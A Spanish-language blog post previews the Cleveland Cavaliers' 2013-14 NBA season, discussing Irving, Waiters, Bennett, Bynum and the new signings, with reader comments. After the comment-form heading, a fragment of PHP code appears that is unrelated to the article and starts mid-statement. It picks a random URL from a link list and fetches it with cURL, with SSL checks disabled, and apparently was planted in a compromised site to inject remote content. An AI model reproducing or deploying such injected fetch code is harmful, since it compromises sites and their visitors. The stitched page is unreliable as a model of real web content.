Cleveland Cavaliers: JASP

30 de September de 2013 por rumbero

Si la temporada pasada presentábamos el análisis de los Cavs con el título “Sin prisa”, ésta podríamos redondearlo sin equivocarnos demasiado con un “pero sin pausa”. Sabiendo que estamos ante la plantilla con la edad media más joven de toda la NBA (23,8 años) y que se trata de un equipo que ha disfrutado de buenas elecciones en el draft merced a sus mediocres temporadas y a la diosa fortuna encarnada en Nick Gilbert, no deberíamos ser excesivamente exigentes con ellos. Pero la evolución de muchos de sus jugadores y las incorporaciones de este año hacen pensar que los Cavs pueden y deben empezar a ser un rival más incómodo de lo habitual sin perder de vista que se trata aún de una plantilla en construcción.

El principal responsable de devolver la esperanza a Cleveland y enterrar el nombre de Lebron sigue siendo Kyrie Irving que a sus 21 años se ha convertido en el faro que debe llevar a la franquicia a cotas más altas. Esa clase de jugador con el que hubiera disfrutado el bueno de Andrés al grito de “¡jugón!”. Irving lo tiene todo para ser uno de los mejores bases de la competición: Excelente manejo de balón, capacidad para romper tobillos, un rango de tiro muy completo y una aura de jugador singular. Siendo la referencia anotadora del equipo estas dos últimas temporadas y con la especial atención que le han prestado las defensas rivales ha conseguido promediar más de 20 puntos por partido con aceptables porcentajes (46% FG y 39% 3P). Además si seguimos tirando de números nos encontramos con un jugador capaz de liderar el equipo. En ese limbo temporal llamado “Clutch Time” que para los estadistas equivale a los últimos 5 minutos de partido mientras que para el resto de mortales es ese pequeño espacio de tiempo donde se ganan y pierden partidos a la vez que se crean y destruyen mitos, Irving cosechó en esta última temporada 145 puntos en 35 partidos. Por encima suyo sólo encontramos a dos señores como Kevin Durant y Kobe Bryant con 154 puntos pero más partidos a cuestas y peor porcentaje de tiro. Él debe ser “la mano que mece la cuna” de los Cavs… siempre y cuando no se la vuelva a romper golpeando una pared durante un entrenamiento. Y es que el único pero que se le puede poner a Irving hasta la fecha es su “peculiar” salud. Se ha lesionado un tobillo, el hombro, la mano, un dedo índice y hasta el maxilar, aunque gracias a esta lesión pudimos conocer su versión enmascarada capaz de hacer temblar el Madison. 

De la mano de Irving han crecido Tristan Thompson y Dion Waiters, otros dos jóvenes de 22 y 21 años respectivamente que han tenido que luchar (y deberán seguir haciéndolo) contra las dudas que generaron sus elecciones. El primero de ellos ha demostrado una notable evolución en su temporada sophomore siendo capaz de quedarse cerca de promediar un doble-doble por partido, aunque también se llevó el dudoso honor de ser el jugador que más tapones recibió en una temporada por lanzamientos intentados. Este año debe mejorar su porcentaje de tiro cerca del aro, demostrar que es más que un buen rebotero y certificar que cambiar la mano de tiro ha sido una buena decisión. Por otro lado Waiters ofreció una sólida temporada como rookie y apunta a proyecto de jugador completo y con capacidad de mejora. Con un año NBA a sus espaldas, un Irving sano y las alternativas que ofrece la plantilla, debería mejorar la selección de tiro y aprender a jugar más sin balón, que fueron sus puntos negativos en su primera temporada. Él está convencido que pronto va a ser el mejor escolta de la NBA y así lo ha hecho saber. Habrá que ver como le va en el intento.

Cerrando el círculo de los más jóvenes tenemos al número #1 de este draft. Esta vez los Cavs rompieron los mocks más que nunca y se llevaron por petición expresa de Mike Brown a Anthony Bennett, no sin reticencias por parte de Dan Gilbert que intentó traspasar hasta el último momento la valiosa 1ª elección. Lo cierto es que hay dudas con él. Una lesión en el hombro ha impedido verlo en los workouts y físicamente no parece estar en las mejores condiciones. Además por tamaño y habilidades está a medio camino entre ser un SF o PF. El 3’5 de toda la vida que tantos problemas suele tener en la NBA para encontrar su sitio. Defensivamente le queda mucho por crecer pero a nivel ofensivo es uno de los jugadores más completos de este draft siendo capaz de moverse bien en la pintura pese a su estatura a la vez que puede atacar desde fuera con su buen lanzamiento de media/larga distancia. Esa versatilidad en ataque es la principal causa por la que han apostando fuerte por él desde la franquicia jugando la peligrosa carta de “jugador con potencial” en un draft de escaso nivel. Tendrá que aprender a convivir con el peso de ser un nº1 y encontrar acomodo en el quinteto para explotar sus cualidades. En ese caso habrá jugador.

Pero no todo van a ser polluelos en Cleveland ya que han llegado a la ciudad tres hombres que deben echarles una mano y completar las carencias de la plantilla. Dejando a un lado las ganas que pueda tener Gilbert de meter al equipo en postemporada para empezar a olvidar fantasmas en forma de rey, está el hecho de que para que los jóvenes sigan creciendo deben habituarse a competir y luchar por ganar partidos. Como parte necesaria del proceso el jefe se ha movido en consecuencia y ha intentando mejorar la plantilla de la temporada anterior.

El primero de los veteranos es Jarrett Jack que viene de firmar una extraordinaria campaña con los Warriors. El que viera un par de partidos de los de la Bahía la pasada temporada sabrá de la importancia del base en el atractivo small ball que practicaron los de Mark Jackson. La cuestión es ver si el que fuera serio candidato a mejor sexto hombre, además de aportar esa dosis necesaria de experiencia, va a cumplir únicamente el rol de sustituto de Irving o si por el contrario va a tener más incidencia en el juego coincidiendo muchos minutos con él en pista como pasara con Curry. Comparando las características de Stephen y Kyrie no parece a priori una opción tan válida además de que eso podría suponer menos minutos para la progresión de Waiters. En cualquier caso los Cavs obtienen con su incorporación un buen organizador y tirador a la vez que amplían el abanico de posibilidades de su backcourt.

El segundo hombre elegido ha sido Earl Clark, una de los mayores sorpresas de la pasada temporada. Después de ser de las pocas alegrías en la decepcionante temporada de los Lakers y disfrutar de más minutos de los que venía acumulando hasta entonces en Phoenix y Orlando, hemos visto a un jugador capaz de sumar en los dos lados de la pista a pesar de algunas carencias técnicas, aportando siempre intensidad y sacando provecho de su buen físico. Habrá que calibrar hasta qué punto su rendimiento puede ser parecido al de su campaña con los angelinos. Ahí era un joven que en principio debía contar con poco protagonismo y este año será un “veterano” con un contrato de 8 millones bajo el brazo. Pero aún en este contexto parece claro que debe ser un buen pegamento para el equipo, reforzando en principio la despoblada posición de alero (más si cabe ante la duda de donde debe acabar jugando Bennett) y seguir disfrutando de minutos para corroborar el proyecto de jugador que era en 2009.

El tercer hombre que debía llegar a la ciudad se perdió por el camino y los Cavaliers tuvieron que recurrir a un niño grande de nombre Andrew Bynum. Una alma de bailaora atrapada en un cuerpo de gigante que suele estar más pendiente del cardado de su pelo que de sus maltrechas rodillas. Al amigo Bynum lo conocemos todos y extendernos con sus virtudes y defectos nos llevaría demasiado tiempo pero de momento parece que aún no está recuperado de su año en blanco con los Sixers y va a perderse la pretemporada. Es el “if…” por excelencia de todos los jugadores de la NBA: si estuviera medio sano y lo recuperaran para la causa baloncestística sería el complemento perfecto para Irving y un auténtico lujo para la pintura de los Cavs que subirían automáticamente un par de posiciones en sus aspiraciones de la temporada. Pero, ¿quién apuesta por ello?

Quizás por eso los Cavaliers han seguido contando con Anderson Varejao en su plantilla. Su inicio en la anterior temporada fue brillante llegando a promediar 14 rebotes por partidos pero un coágulo en el pulmón lo dejó en el dique seco todo el año. Ya sin ese hype sigue siendo un activo valioso, tanto a nivel deportivo como para un posible traspaso, pero si preocupa la salud de Bynum la de Varejao no está para tirar cohetes. En la Conferencia Este la dupla Bynum-Varejao debería arrasar los tableros rivales pero lo cierto es que si entre los dos consiguen sumar 80 partidos en Regular Season no sería una mala notícia para los Cavaliers. Siguen también en la plantilla CJ Miles y Alonzo Gee después de firmar sendas correctas temporadas. El primero debe ser el relevo anotador de Waiters mientras que el segundo vendrá a ocupar en principio un papel parecido al de Earl Clark en la posición de alero.

A esta segunda unidad hay que sumarle también a Tyler Zeller, otro joven de 23 años que nos hemos dejado por el camino. Su temporada rookie ha sido suficientemente buena como para pensar que va a seguir gozando de minutos en la rotación interior de los Cavs y más sabiendo la delicada salud de esta. Se le espera algo menos verde para esta temporada y también más rellenito ya que parece ser que ha estado trabajando su falta de peso a base donuts. Si a eso le añade algo más de mala leche e intensidad en defensa y lo suma a su buen repertorio ofensivo en el poste debe ser una pieza válida. Cierran la plantilla Carrick Felix, Sergey Karasev y Matthew Dellavedova. Más madera de la tierna para el equipo. Deberían ir entrando poco a poco en la rotación en busca de minutos aunque habrá que echarle un ojo al talento del ruso cuando el equipo necesite de anotación exterior.

Al mando del equipo estará Mike Brown, hijo pródigo de Cleveland que cuenta con grandes admiradores en este blog. Olvidada su etapa como entrenador jefe de los Lakers vuelve al equipo donde se labró un nombre como coach. Como especialista defensivo tiene trabajo por delante: La temporada pasada los Cavaliers fueron el 5º equipo que más puntos recibió en contra y el que mejor porcentaje de tiro permitió al rival (47% FG). Por ahí debe empezar a construir la base del proyecto. Su objetivo debe ser crear un equipo sólido alrededor de la figura de Irving para que este pueda explotar todas sus habilidades. Algo parecido (y salvando las distancias con esta comparación) a lo que pasó con Rose y los Bulls. Para eso el núcleo más joven deberá demostrar que está para retos mayores que 30 victorias en temporada regular y que la salud (y en algún caso la cabeza) se porte bien con los puntales del equipo ya que todo lo dicho pierde sentido si jugadores como Irving, Bynum o Varejao se pasan más tiempo en la enfermería que en la pista. En cualquier los Cavaliers siguen con la hoja de ruta tomada después de la “The Decision” y esta temporada toca demostrar que están preparados y dar un paso al frente.

Quinteto inicial: Kyrie Irving, Dion Waiters, Earl Clark / Alonzo Gee, Tristan Thompson, Andrew Bynum/Anderson Varejao (el que ande sano en ese momento)
6º hombre: Jarrett Jack

Altas: Andrew Bynum, Jarrett Jack, Earl Clark, Anthony Bennett, Carrick Felix, Sergey Karasev, Matthew Dellavedova
Bajas: Wayne Ellington, Marreese Speights, Shaun Livingston, Daniel Gibson, Omri Casspi, Luke Walton, Chris Quinn

Previsión: Rondando las 40 victorias y peleando por las últimas plazas de PO.

Comenta

7 comentarios a esta entrada

  1. Denise dice:
    #1

    Gran analisis, Rumbero

    Este equipo debe hacer si o si Playoffs. En mi opinión, los Cavs serán 7º y si Bynum volviese a ser el de hace 4 años y Bennett les saliera bueno, tendrían hasta chances de escalar posiciones en la regular y avanzar a segunda ronda.
    Pero personalmente, no confío mucho en Bynum, hará algunos partidos buenos, pero creo que tarde o temprano volverá a romperse. Tampoco me acaba de convencer la colección de 3’5 que tiene Brown, en especial la elección de Bennett. Yo habría seleccionado a Porter ó directamente haber traspasado la elección por un alero con experiencia.
    En definitiva, es un conjunto con buen futuro aunque todavía un pelin verde para alcanzar cotas mayores.

      Citar

  2. JHC dice:
    #2

    Veremos un año mas Kyrie el cual tiene una pinta de crack impresionante

    Las debilidades vienen del puesto de 3 (deberian haber pillao a Porter en el draft) y de las muchos jugadores fragiles en las posiciones interiores, miedo da el combo Varejao-Bynum !!

      Citar

  3. Esteban dice:
    #3

    Exelente analisis, es un equipo q con beuan salud estaria luchando por segunda ronda en el este

    Pero bynum, varejao e irving son demasiado riesgo

    Sobre bennett, espero q brown lo convenza rapido en tratar de convertirse en elton brand y no en lebron james, de lo contrario terminara a medio camino de ambos, como otro pick alto,derrick williams

      Citar

  4. rumbero dice:
    #4

    Denise:
    Pero personalmente, no confío mucho en Bynum, hará algunos partidos buenos, pero creo que tarde o temprano volverá a romperse.

    Es para confiar poco, pero en algun momento tendrá que ponerse a jugar y a hacerlo bien para seguir ganando más de 10 kilos por temporada o los equipos se van a cansar de él. Las rodillas las tendrá hecha un cristo pero su predisposición para volver bien genera casi más dudas que lo primero…
    En el resto concidimos más o menos todos, difícil que se den todos los condicionantes de progresión y salud para dar un salto de los buenos, aunque yo veo a Irving rompiéndolo bastante esta temporada. Un TOP-10 de la liga en poco tiempo.

      Citar

  5. Esteban dice:
    #5

    alguien vio a los cavs anoche aun sin bynum

    mamita, hay equipo de PO aqui

      Citar

  6. Esteban dice:
    #6

    y disulpen pero bennet no puede jugar de 3, es hasta mas 5 que 3

      Citar

  7. rumbero dice:
    #7

    Esteban:
    y disulpen pero bennet no puede jugar de 3, es hasta mas 5 que 3

    Los estoy viendo ahora. Yo me esperaría a que pierda algunos kilos porque se le ve bastante fondón. En cambio físicamente veo a Waiters y Thompson muy bien y este último se está saliendo. Jack va a ser un lujo. Me estan gustando. Por los Bucks, Knight y Mayo like escopetas de feria y vaya con el físico de Antetokounmpo con 18 añitos.

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>